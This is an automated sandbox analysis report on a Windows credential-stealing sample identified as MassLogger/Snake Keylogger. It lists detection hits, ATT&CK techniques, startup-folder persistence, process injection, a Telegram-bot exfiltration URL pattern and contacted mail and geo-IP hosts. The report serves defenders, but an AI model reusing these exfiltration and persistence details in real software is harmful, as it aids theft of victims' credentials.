                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3ab77b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3b05fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6996, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7368, type: MEMORYSTR
                    Yara detected MassLogger RAT
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3ab77b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3b05fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6996, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3ab77b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3b05fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6996, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7368, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		Valid Accounts1
                    Scheduled Task/Job                    		111
                    Scripting                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		211
                    Process Injection                    		3
                    Obfuscated Files or Information                    		LSASS Memory13
                    System Information Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		12
                    Software Packing                    		Security Account Manager21
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder                    		2
                    Registry Run Keys / Startup Folder                    		1
                    DLL Side-Loading                    		NTDS1
                    Process Discovery                    		Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Masquerading                    		LSA Secrets31
                    Virtualization/Sandbox Evasion                    		SSHKeylogging23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                    Virtualization/Sandbox Evasion                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                    Process Injection                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634734 Sample: TtLlwb3ava.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 35 reallyfreegeoip.org 2->35 37 mail.ncsp.pk 2->37 39 2 other IPs or domains 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Antivirus / Scanner detection for submitted sample 2->43 45 Multi AV Scanner detection for submitted file 2->45 49 9 other signatures 2->49 8 wscript.exe 1 2->8         started        11 TtLlwb3ava.exe 5 2->11         started        signatures3 47 Tries to detect the country of the analysis system (by using the IP) 35->47 process4 file5 55 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->55 14 Activator.exe 2 8->14         started        23 C:\Users\user\AppData\Roaming\Activator.exe, PE32 11->23 dropped 25 C:\Users\user\AppData\...\Activator.vbs, ASCII 11->25 dropped 27 C:\Users\...\Activator.exe:Zone.Identifier, ASCII 11->27 dropped 57 Drops VBS files to the startup folder 11->57 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->59 17 InstallUtil.exe 15 2 11->17         started        signatures6 process7 dnsIp8 61 Antivirus detection for dropped file 14->61 63 Multi AV Scanner detection for dropped file 14->63 65 Writes to foreign memory regions 14->65 67 Injects a PE file into a foreign processes 14->67 20 InstallUtil.exe 2 14->20         started        29 checkip.dyndns.com 132.226.8.169, 49692, 49697, 80 UTMEMUS United States 17->29 31 mail.ncsp.pk 209.182.213.250, 49696, 49701, 587 INMOTI-1US United States 17->31 33 reallyfreegeoip.org 104.21.80.1, 443, 49694, 49699 CLOUDFLARENETUS United States 17->33 69 Tries to steal Mail credentials (via file / registry access) 17->69 signatures9 process10 signatures11 51 Tries to steal Mail credentials (via file / registry access) 20->51 53 Tries to harvest and steal browser information (history, passwords, etc) 20->53

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    TtLlwb3ava.exe72%VirustotalBrowse
                    TtLlwb3ava.exe79%ReversingLabsWin32.Spyware.Negasteal
                    TtLlwb3ava.exe100%AviraTR/AD.SnakeStealer.qzqju

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Activator.exe100%AviraTR/AD.SnakeStealer.qzqju
                    C:\Users\user\AppData\Roaming\Activator.exe79%ReversingLabsWin32.Spyware.Negasteal

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://mail.ncsp.pk0%Avira URL Cloudsafe
                    http://mail.ncsp.pkd0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mail.ncsp.pk
                    		209.182.213.250
                    		truefalse
                      		unknown
                      reallyfreegeoip.org
                      		104.21.80.1
                      		truefalse
                        		high
                        checkip.dyndns.com
                        		132.226.8.169
                        		truefalse
                          		high
                          checkip.dyndns.org
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://reallyfreegeoip.org/xml/8.46.123.189false
                              		high
                              http://checkip.dyndns.org/false
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://stackoverflow.com/q/14436606/23354TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1234437287.0000000002971000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.00000000045A9000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1376773005.00000000035A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/mgravell/protobuf-netJTtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.org/botInstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://reallyfreegeoip.orgdInstallUtil.exe, 00000002.00000002.2472513262.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.000000000310E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://mail.ncsp.pkInstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://mail.ncsp.pkdInstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://github.com/mgravell/protobuf-netTtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://checkip.dyndns.orgInstallUtil.exe, 00000002.00000002.2472513262.0000000002561000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/mgravell/protobuf-netiTtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://tools.ietf.org/html/rfc4253#section-4.2Activator.exe.0.drfalse
                                                		high
                                                https://reallyfreegeoip.org/xml/8.46.123.189lInstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://checkip.dyndns.comdInstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://stackoverflow.com/q/11564914/23354;TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.00000000045A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://stackoverflow.com/q/2152978/23354TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.00000000045A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://checkip.dyndns.org/qTtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://reallyfreegeoip.org/xml/8.46.123.189dInstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://reallyfreegeoip.orgInstallUtil.exe, 00000002.00000002.2472513262.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.000000000310E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://checkip.dyndns.orgdInstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://reallyfreegeoip.orgInstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://checkip.dyndns.comInstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://checkip.dyndns.org/dInstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTtLlwb3ava.exe, 00000000.00000002.1234437287.0000000002971000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1376773005.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://api.telegram.org/bot-/sendDocument?chat_id=TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://reallyfreegeoip.org/xml/TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            132.226.8.169
                                                                            		checkip.dyndns.comUnited States
                                                                            		16989UTMEMUSfalse
                                                                            209.182.213.250
                                                                            		mail.ncsp.pkUnited States
                                                                            		54641INMOTI-1USfalse
                                                                            104.21.80.1
                                                                            		reallyfreegeoip.orgUnited States
                                                                            		13335CLOUDFLARENETUSfalse

                                                                            General Information

                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                            Analysis ID:1634734
                                                                            Start date and time:2025-03-11 04:10:37 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 8m 14s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:15
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:TtLlwb3ava.exe
                                                                            renamed because original name is a hash value
                                                                            Original Sample Name:1622c28fa57b7ff8998eac6ae42e6cb6662446c47b25ff24befb841356267c7d.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 94%
                                                                            • Number of executed functions: 527
                                                                            • Number of non-executed functions: 33
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 23.199.214.10, 4.245.163.56
                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            04:11:36AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs
                                                                            23:11:45API Interceptor22x Sleep call for process: InstallUtil.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            132.226.8.169UQaaxEZwyg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            UO6rlOX6cT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • checkip.dyndns.org/
                                                                            miYVCPJgtg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            jmh61pt3ob.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            rmyOJqDzOdTXpHSh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            6x1aatLMNa.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • checkip.dyndns.org/
                                                                            zDW3yN4Qs2.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            tQe9Wh4CRA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            z0VHyUwtBk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            85e047k8bQ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            104.21.80.1PRI_VTK250419A.exeGet hashmaliciousLokibotBrowse
                                                                            • touxzw.ir/scc1/five/fre.php
                                                                            DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rbopisalive.cyou/2dxw/
                                                                            Marzec 2025-faktura.pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • www.oldpay.online/u023/?lneDc=2js00DxFGjY6gHlVOW1q9a10L3HzPIs7WpRmaT2A/LnakQk0VzYAjcxSKMUcEwKHsPPKaiHoQA==&NvExnX=FrapFFYPB
                                                                            z1companyProfileandproducts.exeGet hashmaliciousFormBookBrowse
                                                                            • www.dd87558.vip/uoki/
                                                                            http://7a.ithuupvudv.ruGet hashmaliciousUnknownBrowse
                                                                            • 7a.ithuupvudv.ru/favicon.ico
                                                                            PRI_VTK250419A.exeGet hashmaliciousLokibotBrowse
                                                                            • touxzw.ir/scc1/five/fre.php
                                                                            dfiCWCanbj.exeGet hashmaliciousLokibotBrowse
                                                                            • touxzw.ir/sccc/five/fre.php
                                                                            laser (2).ps1Get hashmaliciousFormBookBrowse
                                                                            • www.lucynoel6465.shop/jgkl/
                                                                            laser.ps1Get hashmaliciousFormBookBrowse
                                                                            • www.tumbetgirislinki.fit/k566/
                                                                            QUOTATION REQUEST.exeGet hashmaliciousFormBookBrowse
                                                                            • www.shlomi.app/t3l4/

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            reallyfreegeoip.orgly1dkCzsOZ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 104.21.112.1
                                                                            UQaaxEZwyg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.80.1
                                                                            lOZOR68JAB.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 104.21.64.1
                                                                            1evYVracjk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.96.1
                                                                            tng2fDLoUK.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.32.1
                                                                            UO6rlOX6cT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 104.21.48.1
                                                                            g24MtZOMrp.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 104.21.48.1
                                                                            wkFEXQNJ9p.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.32.1
                                                                            Nnsy4IvTvO.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 104.21.96.1
                                                                            OkxI7TL5y9.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 104.21.96.1
                                                                            checkip.dyndns.comly1dkCzsOZ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 132.226.247.73
                                                                            UQaaxEZwyg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.8.169
                                                                            lOZOR68JAB.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 193.122.6.168
                                                                            1evYVracjk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.247.73
                                                                            tng2fDLoUK.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.247.73
                                                                            UO6rlOX6cT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 132.226.8.169
                                                                            g24MtZOMrp.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 132.226.247.73
                                                                            wkFEXQNJ9p.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.247.73
                                                                            Nnsy4IvTvO.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 132.226.247.73
                                                                            OkxI7TL5y9.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 193.122.6.168

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUSly1dkCzsOZ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 104.21.112.1
                                                                            sY8Sfsplzf.exeGet hashmaliciousFormBookBrowse
                                                                            • 104.21.112.1
                                                                            UQaaxEZwyg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.80.1
                                                                            lOZOR68JAB.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 104.21.64.1
                                                                            1evYVracjk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.96.1
                                                                            tng2fDLoUK.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.32.1
                                                                            UO6rlOX6cT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 104.21.48.1
                                                                            g24MtZOMrp.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
